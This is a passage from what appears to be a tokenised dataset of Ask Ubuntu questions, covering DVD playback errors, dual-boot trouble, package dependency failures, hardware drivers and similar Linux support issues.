libdvdread : could not open /dev/dvd libdvdnav : vm : failed to open/read the dvd libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd no such file or directory libdvdread : could not open /dev/dvd [ 0x7f2060001168 ] dvdread demux error : dvdread can not open source : /dev/dvd [ 0x7f2074000b78 ] main input error : open of `dvd : ///dev/dvd ' failed banshee banshee plays the intro , but crashes within the first seconds of the movie : libdvdread : get key for /video_ts/vts_04_1.vob at 0x000047c1 libdvdread : elapsed time 0 libdvdread : found 4 vts's libdvdread : elapsed time 0 ** ( banshee:4512 ) : critical ** : bp_get_subtitle_description : assertion 'code ! = null ' failed [ info 16:14:19.926 ] inhibiting screensaver during fullscreen playback ** ( banshee:4512 ) : critical ** : gst_video_decoder_allocate_output_frame : assertion 'frame- > output_buffer == null ' failed [ error 16:14:51.027 ] gstreamer stream error : failed ( banshee:4512 ) : gstreamer-critical ** : gst_element_query_position : assertion 'gst_is_element ( element ) ' failed ( banshee:4512 ) : gstreamer-critical ** : gst_element_seek : assertion 'gst_is_element ( element ) ' failed ( banshee:4512 ) : glib-gobject-critical ** : g_object_get : assertion 'g_is_object ( object ) ' failed ( banshee:4512 ) : glib-gobject-critical ** : g_object_get : assertion 'g_is_object ( object ) ' failed xine does not work at all : $ xine this is xine ( x11 gui ) - a free video player v0.99.7 . ( c ) 2000-2010 the xine team . failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory vo_vdpau : ca n't create vdp device : no vdpau implementation . libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd no such file or directory libdvdread : using libdvdcss version 1.2.13 for dvd access libdvdread : ca n't stat /dev/dvd no such file or directory other information when i insert the dvd , i get : $ dmesg | tail [ 31.247778 ] vboxdrv : fasync=0 offmin=0x34c offmax=0x142c [ 31.247885 ] vboxdrv : tsc mode is 'synchronous ' , kernel timer mode is 'normal ' . [ 31.247886 ] vboxdrv : successfully loaded version 4.2.16_ubuntu ( interface 0x001a0005 ) . [ 31.292926 ] vboxpci : iommu not found ( not registered ) [ 35.064449 ] init : plymouth-stop pre-start process ( 1734 ) terminated with status 1 [ 42.824129 ] adding 3854332k swap on /dev/mapper/cryptswap1 . priority : -1 extents:1 across:3854332k fs [ 109.823293 ] udf-fs : info mounting volume 'r.i.p.d . ' , timestamp 2013/09/06 16:17 ( 103c ) [ 743.918140 ] perf samples too long ( 2507 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 2919.903058 ] perf samples too long ( 5006 > 5000 ) , lowering kernel.perf_event_max_sample_rate to 25000 [ 9509.139752 ] udf-fs : info mounting volume 'r.i.p.d . ' , timestamp 2013/09/06 16:17 ( 103c )
431396	chmod crash version 13.10	i was watching a command line reference tutorial and testing out two commands , chmod and chown . i ended up changing my root folder 's permissions . what should i do ? version 13.10 .
431397	setting up ubuntu 12.04 to be accessed remotely from anywhere	i am extremely new to ubuntu . i am using ubuntu for the very first time because this is for a school assignment . my main goal right now is to be able to access my ubuntu desktop remotely from anywhere . i have ubuntu running in virtualbox . i have also installed ubuntu server , along with mysql , apache , and php5 . in the network settings i have two adapters enabled . the first adapter is for the `` bridged-network '' and the other is nat . i have success connecting remotely through my local network , but i want to be able to access ubuntu from anywhere , using any computer . i am unsure of how to go abouts in doing so . i do feel like i would have to do some port forwarding , but that is all that i am thinking of . any ideas are greatly appreciated .
431402	dual booting between ubuntu and windows 8 ?	i had preinstalled windows 8 on my laptop . i installed ubuntu 13.10 ( disabled secure boot , turned off fast start-up and put the system to legacy support ) . then i used the boot fix commands provided on this site to enable booting of windows 8 and ubuntu . however after a few days ubuntu crashed and so did windows 8 . i was unable to log in to any of the os and was getting a grub menu only ( terminal like window ) . now i am running a pirated copy of windows 8.1 . but i need to run ubuntu along with some version of windows on my pre installed win8 laptop . some detailed help on this matter would be highly appreciated . thanks ! !
431407	ca n't dual boot ubuntu 13.10 using usb or cd	this is my first question , so i hope you can help me . fist i have windows 8.1 pro and i dual booted ubuntu 13.10 before using usb ( using unetbootin ) , then i had to remove ubuntu , but when i wanted to install it again using usb or even cd the system always boots win 8.1 . so how can i use usb installation again ? ? ? ?
431412	removing specific strings from file	i have a file containing some data as in the following example : data1 : it is my data data2 : some more data data3 : even some more data what i want is the following output in another file : it is my data some more data even some more data please guide me how to do it !
431419	wired internet connect issue	when i first start up my pc it will not recognize the wired connection . if i run ifconfig this is what i get ; code : eth4 link encap : ethernet hwaddr 00:05:5d:29:4f:5b inet6 addr : fe80 : :205:5dff : fe29:4f5b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:60 ( 60.0 b ) tx bytes:4252 ( 4.2 kb ) interrupt:23 base address:0xb400 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:28 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1696 ( 1.6 kb ) tx bytes:1696 ( 1.6 kb ) i have to run ... . code : sudo pkill -9 networkmanager then it will connect every time . this would not be a problem if it was just me using this computer but that is not the case . also the pc has a rtl-8029 ( as ) network card i have looked at tons of threads but none of the solutions solved my problem . or it could be that i do not have the technical ability to follow through with these solutions . ... . plz spell it out for an idiot thanks
431421	is there a build of audacity for ubuntu that can use a local version of ffmpeg ?	audacity builds on ubuntu no longer support ffmpeg because of the libav foolishness . is there maybe a ppa or something with a build of audacity that supports using a local build of ffmpeg ? i could compile it myself , but it would be a set back in terms of being time consuming , especially if there are errors . p.s . please do not suggest the nightly ppa , it does n't support ffmpeg .
431422	ubuntu wo n't boot up and how to remove second ubuntu	so yeah , my ubuntu 13.10 did n't boot after i tried to get numlock to start in bootup . so i installed ubuntu again but now i have 2 separate ubuntu install , and the older wont boot but the new boots but i do n't have my files and programs on this new ubuntu so how do i a ) get my old ubuntu to work b ) delete the other ubuntu ?
431425	problem with installing build essential packages	i already did sudo apt-get install update , and sudo apt-get install build essential , and here is my full message : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : build-essential : depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed openjdk-6-jre-headless : depends : openjdk-6-jre-lib ( > = 6b27-1.12.6-1ubuntu0.12.04.4 ) but 6b27-1.12.6-1ubuntu0.12.04.2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i hope you can help .
431428	ubuntu messed up my hard drive partition	when i got my laptop 2 years ago , it had been partitioned to 2 partitions in factory , drive c : / and drive d : / . after i installed ubuntu ( twice for now , first messed up ) my d : / drive became unusable from windows . i can view it from my ubuntu but not from my windows i really need this drives content because there are all my krhm ... games .
431429	resizing ubuntu 13.10 partitions	i installed ubuntu 13.10 to this device ( picture below ) , and it has the following partitions on the picture below , i ca n't resize the extended partition , i want to create a ntfs partition on same device is there any idea how to do it ? http : //i.stack.imgur.com/wkmqk.png
431431	unable to browse internet in ubuntu	i am not able to browse internet in ubuntu 12.10 i am observing this issue randomly i.e . normally am able to browse internet but all of a sudden am facing this problem and after some 30 mins or something am able to browse the internet again . i am sure its not a service provider issue as i have connected my laptop and mobile to the wi-fi , and am able to browse internet in my phone . please help me with your inputs .
431433	upgraded to 12.10 , and monitor resolution is not being detected	i apologize in advance for my ignorance , i am a novice ubuntu user . i 've used 12.04 for a long time , and today i decided to start the process of upgrading . i upgraded to 12.10 & encountered resolution problems on the re-start . the monitor is hooked up via dvi , but nothing has changed on that front since it last worked properly aside from the upgrade . it happened on the re-start . i 'm not sure if it is a driver problem or what my exact specs are for the video/graphics card ( s ) . my mouse pointer also seems jumpy/glitchy . i 'll try to supply information that you request as you help solve my problem . thanks in advance . it is greatly appreciated . graphics as listed in system details driver - vesa : rv620 experience - fallback more updates : linux accbiggz-studio-slim-540s 3.5.0-47-generic # 71-ubuntu smp tue feb 18 23:59:30 utc 2014 i686 i686 i686 gnu/linux 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv620 le [ radeon hd 3450 ]
431436	can not upgrade from ubuntu 13.04 to 13.10 using gui nor command line	i want to upgrade my ubuntu 13.04 to the latest ubuntu 13.10 , but it seems it doesnâ´t want to do it so . this is what iâ´ve tried ( after a backup ) : 1 . using the gui first : clicked on `` software updater '' it appears the message `` software updates are no longer provided for ubuntu 13.04 . to star secure , you should upgrade to ubuntu 13.10 '' . i click on `` upgrade ... '' button after the `` authentication is required '' message ... nothing happens ! i wait and wait and nothing happens . no process , no nothing . 2 . i try then the command line method typing these : sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade after all processes are finished , i then type : sudo apt-get install update-manager-core the message i receive is : update-manager-core is already the newest version . i then type : sudo apt-get autoremove it does remove some gimp related help file . and then i type : sudo do-release-upgrade the messages i get are these : checking for a new ubuntu release . no new release found then i go again to the gui software updater , and in fact , i still got the 13.04 version . the same thing after a system restart . what should i do ?
431437	installing the intuos cth-480 drawing tablet in a amr chromebook	i am trying to get my intuos drawing tablet to work on my chromebook , and since it 's not compatible with the google os , i chose to install ubuntu 13.10 and get the drivers . i did so , and ubuntu 13.10 is working fine , and i downloaded the kernel driver input-wacom-0.20.0 from http : //sourceforge.net/projects/linuxwacom/files/xf86-input-wacom/input-wacom/ then , i tried to follow the directions found at http : //sourceforge.net/apps/mediawiki/linuxwacom/index.php ? title=input-wacom however , i can not get past the prerequisites section . for the first step , when i enter : sudo apt-get install linux-headers- $ ( uname -r ) it says : e : unable to locate package linux-headers-3.8-11 e : could n't find any package by regex 'linux-headers-3.8.11' i know that my kernel is 3.8.11 , because when i enter : uname -r i get 3.8.11 does this kernel not have intuos support ? i 'm very new to linux , so i do n't even know if i am asking the right questions here . do i need to set the headers to a kernel that does have intuos support ? could someone walk me through this ? as i said in my comment , apt-get install update did not work , so i did apt-cache search linux-headers this was the output : linux-headers-3.11.0-12 - header files related to linux kernel version 3.11.0 linux-headers-generic - generic linux kernel headers linux-libc-dev - linux kernel headers for development linux-source-3.11.0 - linux kernel source for 3.11.0 with ubuntu patches linux-headers-3.11.0-12-generic - linux kernel headers for version 3.11.0 on arm ( hard float ) smp linux-headers-3.11.0-12-generic-lpae - linux kernel headers for version 3.11.0 on arm ( hard float ) smp linux-headers-3.5.0-233 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-233-omap4 - linux kernel headers for version 3.5.0 on ti oma p4-based systems linux-headers-generic-lpae - generic linux kernel headers linux-headers-highbank - linux kernel headers for the armhf architecture linux-headers-omap - linux kernel headers for the armhf architecture linux-headers-omap4 - linux kernel headers for the omap4 architecture linux-libc-dev-arm64-cross - linux kernel headers for development ( for cross-compiling ) linux-libc-dev-armel-cross - linux kernel headers for development ( for cross-compiling ) linux-libc-dev-armhf-cross - linux kernel headers for development ( for cross-compiling ) linux-libc-dev-powerpc-cross - linux kernel headers for development ( for cross-compiling ) linux-headers-3.0.0-3-maguro - linux kernel headers for version 3.0.0 on galaxy nexus linux-headers-3.1.10-6 - header files related to linux kernel version 3.1.10 linux-headers-3.1.10-6-ac100 - linux kernel headers for version 3.1.10 on toshiba ac100-based systems linux-headers-3.1.10-6-grouper - linux kernel headers for version 3.1.10 on nexus 7 linux-headers-3.11.0-203-exynos5- linux kernel headers for version 3.11.0 on arm ( hard float ) smp linux-headers-3.4.0-1-goldfish - linux kernel headers for version 3.4.0 on android touch emulation linux-headers-3.4.0-3-mako - linux kenerl headers for version 3.4.0 on nexus 4 linux-headers-3.4.0-4-manta - linux kernel headers for version 3.4.0 on nexus 10 linux-headers-3.4.0-5-chromebook - linux kernel headers for version 3.4.0 on samsung chromebook linux-headers-ac100 - linux kernel headers for the ac100 architecture . linux-headers-chromebook - linux kernel headers for the samsung arm chromebook . linux-headers-exynos5 - linux kernel headers for exynos5 architecture . linux-headers-goldfish - linux kernel headers for the goldfish kernel . linux-headers-grouper - linux kernel headers for the nexus7 ( grouper ) . linux-headers-maguro - linux kernel headers for the galaxy nexus ( maguro ) . linux-headers-mako - linux kernel headers for the nexus4 ( mako ) . linux-headers-manta - linux kernel headers for the nexus10 ( manta ) . linux-headers-nexus4 - transitional package linux-headers-nexus7 - transitional package linux-headers-3.11.0-13 - header files related to linux kernel version 3.11.0 linux-headers-3.11.0-14 - header files related to linux kernel version 3.11.0 linux-headers-3.11.0-15 - header files related to linux kernel version 3.11.0 linux-headers-3.11.0-17 - header files related to linux kernel version 3.11.0 linux-headers-3.11.0-18 - header files related to linux kernel version 3.11.0 linux-header-3.11.0-13-generic - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-13-generic-lpae - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-14-generic - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-14-generic-lpae - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-15-generic - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-15-generic-lpae - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-17-generic - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-17-generic-lpae - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-18-generic - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-header-3.11.0-18-generic-lpae - linux kernel headers for 3.11.0 on arm ( hard float ) smp linux-headers-3.5.0-234 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-234-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers-3.5.0-235 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-235-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers-3.5.0-236 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-236-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers-3.5.0-237 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-237-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers-3.5.0-238 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-238-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers-3.5.0-239 - header files related to linux kernel version 3.5.0 linux-headers-3.5.0-239-omap4 - header files related to linux kernel version 3.5.0 on ti omap4-based systems linux-headers03.11.0-204-exynos5 - linux kernel headers for version 3.11.0 on arm ( hard float ) smp linux-headers03.11.0-205-exynos5 - linux kernel headers for version 3.11.0 on arm ( hard float ) smp i am looking for one of the header packages for either arm or exynos , right ? i assume the ones that say samsung chromebook ? i did sudo apt-get install linux-headers-chromebook and then went to the next step . unfortunately , i got the same problem when i tried ./configure it completed and read build environment : linux kernel - yes kernel source - no we could not find the kernel development environment to build the driver . please install the kernel source or the kernel development package and try again . there were no other chromebook headers i saw in the list i posted in the pastebin link above . maybe the linux-wacom support does n't work on the chromebook ? update with output from apt-cache search chromebook here : vboot-kernel-utils - chrome os verified boot utils required to sign kernels vboot-utils - chome os verified boot utils linux-headers-3.4.0-5-chromebook - linux kernel headers for version 3.4.0 on samsung chromebook linux-headers-chromebook - linux kernel image for the samsung arm chromebook . linux-image-chromebook - linux kernel image for the samsung arm chromebook linux-image-chromebook - linux kernel image for the samsung arm chromebook . linux-tools-3.4.0-5-chromebook - linux kernel version specific tools for version 3.4.0-5 update with output of dpkg -- get-selections | grep -i chrome | grep -v deinstall here : linux-headers-3.4.0-5-chromebook install linux-headers-chromebook install update with output of dpkg -- get-selections | grep -i linux | grep -v deinstall here : libselinux1 : armhf install linux-headers-3.4.0-5-chromebook install linux-headers-chromebook install linux-libc-ev : armhf install util-linux install
431440	what does this mysql error mean ?	i 'm on xubuntu 13.10 64 bit . i know the password of my mysql database , but still ca n't login as root . i try to change the password sudo mysqld_safe -- skip-grant-tables & i get [ 1 ] 8863 mypc ~ : 140308 20:26:59 mysqld_safe ca n't log to error log and syslog at the same time . remove all -- log-error configuration options for -- syslog to take effect . 140308 20:26:59 mysqld_safe logging to '/var/log/mysql/error.log ' . 140308 20:26:59 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql what does this error mean ? note i that changed the password but still ca n't login as root . so i 'm curious about that particular error . note that i recently messed up /var permissions and fixed it according to this answer . does that have anything to do with this issue ?
431441	( juju ) how to install `` ubuntu-12.04-server-cloudimg-amd64.tar.gz '' manually ?	because of an error over using juju , i 've downloaded these two files : https : //cloud-images.ubuntu.com/server/releases/precise/release-20140227/ubuntu-12.04-server-cloudimg-amd64.tar.gz https : //cloud-images.ubuntu.com/server/releases/precise/release-20140227/ubuntu-12.04-server-cloudimg-amd64-root.tar.gz these two files are not compile-able . they are vms ! and i do n't know where should i extract them . how should i install them ? here is ubuntu-12.04-server-cloudimg-amd64.tar.gz content : precise-server-cloudimg-amd64.img precise-server-cloudimg-amd64-floppy precise-server-cloudimg-amd64-loader precise-server-cloudimg-amd64-vmlinuz-virtual a new error that i got : http : //paste.ubuntu.com/7057154/
431442	overheating + touchpad not working	i 've read a few threads about this , but none had satisfactory answers . i recently installed ubuntu 12.04 on my dell studio 1555 and a few minutes after installation my touchpad stopped working ( the buttons for left-click and right-click work , but i can not scroll or move the mouse cursor at all ) . i use a dualboot with windows 7 , and that works perfectly well . the temperatures are also very high on ubuntu . i 've tried ubuntu earlier as well , but my temperatures have always been very high . i have a ati radeon 5xxx graphic card on my system . the readings from acpi -t are : thermal 0 : ok , 76.0 degrees c thermal 1 : ok , 62.0 degrees c thermal 2 : ok , 59.0 degrees c please help .
431443	ubuntu 13.10 flash webcam blank white	i have a flash plugin webcam application , i tried this link : webcam does n't work in browser ... ? the camera works by showing the led on , but in my webpage , it only leave a blank white , i tried to capture the image and upload it on the server , it saved as white picture , please help me what else i 'm missing . thanks in advance
431445	can not change any icon sizes in kubuntu system settings ... can someone help me please ?	i 'm a newbie when it comes to ubuntu and i 'm using the latest version of kubuntu . when i go to system settings , then application appearance , then icons , then advanced , all the size drop-down boxes for all the `` use of icon '' options have no numbers in them and do nothing when clicked . this happens every time , and regardless of what theme i use . currently i 'm using humanity . i recently installed a new theme , oxyfaenza , then removed it , but i do n't know if that has anything to do with the error . i tried reinstalling system settings using apt-get , no dice . does anyone have any suggestions to help me diagnose the problem and fix it ? thank you : )
431447	chromium downloads all pdf files initially instead of of opening them within the browser	whenever i click on a link which contain a pdf file , chromium automatically downloads the file . instead , i would like to open it for my viewing rather than downloading it . how can i achieve this ?
431451	unable to stat `./mnt ' ( which i was about to install ) : transport endpoint is not connected	when running : apt-get update & & apt-get upgrade on 12.04.3 lts , kernel 3.2.0-35-virtual i get : preparing to replace base-files 6.5ubuntu6.6 ( using ... /base-files_6.5ubuntu6.7_amd64.deb ) ... unpacking replacement base-files ... dpkg : error processing /var/cache/apt/archives/base-files_6.5ubuntu6.7_amd64.deb ( -- unpack ) : unable to stat `./mnt ' ( which i was about to install ) : transport endpoint is not connected no apport report written because maxreports is reached already processing triggers for man-db ... processing triggers for install-info ... errors were encountered while processing : /var/cache/apt/archives/base-files_6.5ubuntu6.7_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) output of df -ha : filesystem size used avail use % mounted on /dev/xvda1 99g 9.1g 85g 10 % / none 0 0 0 - /proc sysfs 0 0 0 - /sys none 0 0 0 - /sys/fs/fuse/connections none 0 0 0 - /sys/kernel/debug none 0 0 0 - /sys/kernel/security udev 819m 12k 819m 1 % /dev devpts 0 0 0 - /dev/pts tmpfs 331m 192k 331m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 827m 0 827m 0 % /run/shm cgroup 827m 0 827m 0 % /sys/fs/cgroup cgroup 0 0 0 - /sys/fs/cgroup/cpuset cgroup 0 0 0 - /sys/fs/cgroup/cpu cgroup 0 0 0 - /sys/fs/cgroup/cpuacct cgroup 0 0 0 - /sys/fs/cgroup/memory cgroup 0 0 0 - /sys/fs/cgroup/devices cgroup 0 0 0 - /sys/fs/cgroup/freezer cgroup 0 0 0 - /sys/fs/cgroup/blkio cgroup 0 0 0 - /sys/fs/cgroup/perf_event output of mount : /dev/xvda1 on / type ext4 ( rw ) none on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) cgroup on /sys/fs/cgroup type tmpfs ( rw , relatime , mode=755 ) cgroup on /sys/fs/cgroup/cpuset type cgroup ( rw , relatime , cpuset , clone_children ) cgroup on /sys/fs/cgroup/cpu type cgroup ( rw , relatime , cpu , clone_children ) cgroup on /sys/fs/cgroup/cpuacct type cgroup ( rw , relatime , cpuacct , clone_children ) cgroup on /sys/fs/cgroup/memory type cgroup ( rw , relatime , memory , clone_children ) cgroup on /sys/fs/cgroup/devices type cgroup ( rw , relatime , devices , clone_children ) cgroup on /sys/fs/cgroup/freezer type cgroup ( rw , relatime , freezer , clone_children ) cgroup on /sys/fs/cgroup/blkio type cgroup ( rw , relatime , blkio , clone_children ) cgroup on /sys/fs/cgroup/perf_event type cgroup ( rw , relatime , perf_event , clone_children ) i have tried solutions found here such as : apt-get clean dpkg -- configure -a dpkg -i -- force-overwrite /var/cache/apt/archives/base-files_6.5ubuntu6.7_amd64.deb rm /var/cache/apt/archives/base-files_6.5ubuntu6.7_amd64.deb also thought i would mention that i am running an lxc container . anybody know how i can clear this up ?
431457	hauppauge capture device suddenly stopped working .	just recently i purchased a hauppauge 950q after seeing that it would supported by my ubuntu tv box . after simply plugging it in and allowing kaffine to scan for channels i left allowing other members of the house to watch tv . when i came back it no longer works the others describe a sudden error and then nothing they did could make it work . i myself have tried re installing the drivers but nothing gets it to work . the odd thing is when i scan for whats plugged into the usb on the console it is still identified as hauppauge .
431460	creating a dvd-r on an acer xp home & install it on an hp xp pro	i have dialup & the modem is missing from the hp computer & reinstall by disk ( copied to ) fails . instructs are always for download & install on the computer that creates it . endless problem trying to get solutions placed onto a dvd/cd with acer computer & install it on the hp . the hp has a driver detection program but no way to repair the missing ones . i have printed the ubunto instructions , should be easy to follow . maybe not ... if the install ( at point of ) starts talking in jargon then i 'm lost . it is not that i am unwilling to learn the jargon , it does n't stick in memory anymore . so help ( printable ) needs to be in the same works i will look for in menus/buttons/whatever . can i make the disc on the acer & use it on the hp ? can i install a dialup modem with the ubunto os ? ( where to find too ) i have infrarecorder installed on acer to make the os . thank you for considering my request .
431464	is anybody using juju for mission critical apps ?	i 've been playing with juju for the last month and it is really awesome but it feels like a black box . it feels like something that i `` just have to trust that it will work '' . i 'm very tempted to use it in my company but as awesome as juju is , it just feels like it is very new and not `` proven to work '' in mission critical environments . of course , i may be completely wrong ... is there anybody out ther really using juju ? not testing and playing with it but really deploying aplications into production environment with it ?
431465	how can i control the kde monitor configuration from a script ?	every morning i come to work , plug in my sleeping laptop into the large monitor on my desk , and then fiddle with this dialog : i imagine that the result of this fiddling is that the `` display settings '' app writes the new monitor configuration to some file , and then sends some signal to the window manager to notice that the settings have changed . i would like to do this myself and control it directly , for this purpose as well as others . if i could find out the name of the process that produces the âdisplay settingsâ dialog i could run it with strace and see what it is doing , but i have n't been able to find that out either . my questions are : to what program does this dialog belong ? what would i look for in the ps output to identify it ? and what is it actually doing when it changes the monitor configuration ? i am using kde 4.8.5 .
431466	ubuntu 13.10 firefox and slimboat often slow and crashes	i have ubuntu 13.10 installed as a dual boot on my asus laptop . everything is mostly working fine , but i am having issues with firefox and slimboat browsers being a bit slow and often crashing when viewing media such as youtube . slimboat crashes the most . sometimes the browsers just freeze , and i need to hard quit them , but often my laptop is forced to shutdown . the screen goes black and i get a couple of lines text , which goes to fast for me to really see , and then ubuntu shuts my laptop off automatically . also i have had this problem sometimes when watching vids on vlc . i am starting to think it is a graphics card thing ( but i am a long way from being an expert ) , as i do some searching online i notice that people have had a similar issue and fixed it by installing old proprietory drivers for their nvidia cards . my graphics card is a `` gallium 0.4 on amd cedar '' . maybe it something else completely !
431467	help with upgrade to 12.10 from 12.04 lts	okay so on my computer ( samsung rv510 ) i was running ubuntu 12.04 lts with no problem . i wanted to upgrade to 12.10 . the upgrade was easy and everything went okay . i restarted my computer , got grub , selected the newer version of linux but i get stuck on a black screen with a still cursor ( it looked like the computer was frozen because the cursor did not respond to my mouse or keyboard . even though i shut down my computer and repeat everything to access ubuntu 12.10 , that black screen still appears .
431471	how to know the hardware encryption capabilities of a system	assuming that i do n't know on witch system i am ( via a remote ssh connection for example and may be on boards powered by an amd thunderbird or an arm processor or the latest intel xeon ... or maybe with encryption expansion card or usb key ) : i want to know what encryption hardware acceleration is available on a ubuntu system via command line under ubuntu . i want to know : what the system hardware is capable of ... what the running linux/ubuntu is capable of ... when i say encryption i include the hash algorithm ( like aes ) witch are part of many encryption solutions . someone can help me ?
431478	decompressing multiple files at once	i have more than 200 .zip files in one folder . i do n't want to decompress those one by one . i want to extract those using single command or script . how to do that .
431482	unsupported resolution directly after bios	as soon as the bios finishes its work , the monitor ( vga ) immediately displays a `` not supported '' message . i have little experience with ubuntu and just installed it as a dual boot with windows xp . before a screen that would even allow me to choose the os appears , this message pops up . on a different monitor , it displays `` out of scan range . '' i have tried holding shift or pressing escape , to which it announces it is booting grubs , but also shows this message shortly . any ideas ? this is 12.04 lts . thanks !
431483	changing kernel in a system not booting	i have a dell inspiron laptop and have just installed 12.04 . the system hangs on boot after 'switching to clocksource tsc ' . i 've searched all the questions here and had no luck changing bios settings or boot parameters . i 'd like to try a different kernel but since i 'm currently running from a usb stick the normal install procedures wo n't work . how do i install another kernel to my hard drive when i ca n't boot into it ? also which kernel would you recommend i try ? i 'm currently trying 3.11.0-15-generic . also how do i check what kernel is currently running ? if it boots ok from the usb stick maybe i should use that kernel ? thanks for reading , hope someone can help .
431485	font size on htpc , with vnc	i use ubuntu to run a home-theater pc at home . i simply use the ubuntu desktop , and run vlc and chrome-browser on the tv . this works fine for us . i 'd like to sometimes log into the machine with vnc , but the font sizes are a sticking point . i have them turned way up for use on the tv , but they 're much to large when connecting via vnc . is there a good way to maintain these two font sizes separately ? one solution is to make the desktop very low resolution so that the default font size works for the tv , but this degrades the picture . i 'd like to avoid that .
431486	ppc boot screen is basically white noise	i 'm trying to boot a powerbook g4 from a usb . i managed to get through the openfirmware shenanigans , and just when i thought i was in the clear , a bunch of orange warning text scrolled across the screen really quickly . then the computer ... booted . on my second try i was able to snap a picture of the warning text , which looks like it could read saned disabled ; edit /etc/default/saned file `` b43/ucode5.fw '' not found \*stopping cold plug devices : firmware file `` b43-open/ucode5.fw '' not found [ ( garbled ) 46.297374 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct ... ( probably drivers ) fully read all instructions on this website . *starting configure virtual network devices pbbuttonsd 0.7.8 : powerbook g4 17 '' ( feb 2005 ) - amu version 12 * starting pbbuttonsd anybody have any idea what to do ?
431495	server 's url not opening in browser and unable to ssh	i just installed softaculous on my server which is using ispconfig3 . but the url https : //myipnumber.com:8080 of my server is not opening in a browser and i am not able to ping to this ip either . and i am not able to ssh to the ( local ) server as well . i have been googling for several hours now and still have not found an answer or even what i should be googling for to find a solution . hope someone here will be able to help out . thanking you in advance , guys .
431497	how to download django 1.6.2 + set the path to python3 ?	i do n't know how to set the path . how shall i install django ? how do i set the django module to the python3 path ? please answer these 2 questions . i 'm a newbie so please bear with me lol . this is my path from python.. naveed @ naveed-virtualbox : ~ $ python3 python 3.2.3 ( default , feb 27 2014 , 21:31:18 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import sys > > > sys.path [ '' , '/usr/lib/python3.2 ' , '/usr/lib/python3.2/plat-linux2 ' , '/usr/lib/python3.2/lib-dynload ' , '/usr/local/lib/python3.2/dist-packages ' , '/usr/lib/python3/dist-packages ' ]
431498	delete grub after deleting ubuntu from mac dual boot	my question is a bot specific . i installed ubuntu 12.04 on my macmini ( mid 2010 ) and deleted it after some problems . i resized my mac partition so that there was no ubuntu partition anymore . but it seems , that i installed grub in a different section . if i am starting my mac i am getting in a grub menu , there i am typing `` exit '' and my mac is booting for about 5 minutes ( very slow ! ) , but later its working fine . but i woud like to deinstall grub now . some people say its dangerous ... is there a safe way ? thanks !
431499	which “pactl” : audio source is “curently playing” one	i 'd like to capture the audio comming out of my soundcard , with : gst-launch -v ! pulsesrc device=x ! audioconvert ! vorbisenc ! webmmux ! filesink location=audio.mkv i do n't know which source x to give as argument , pactl gives me to many to try them all .
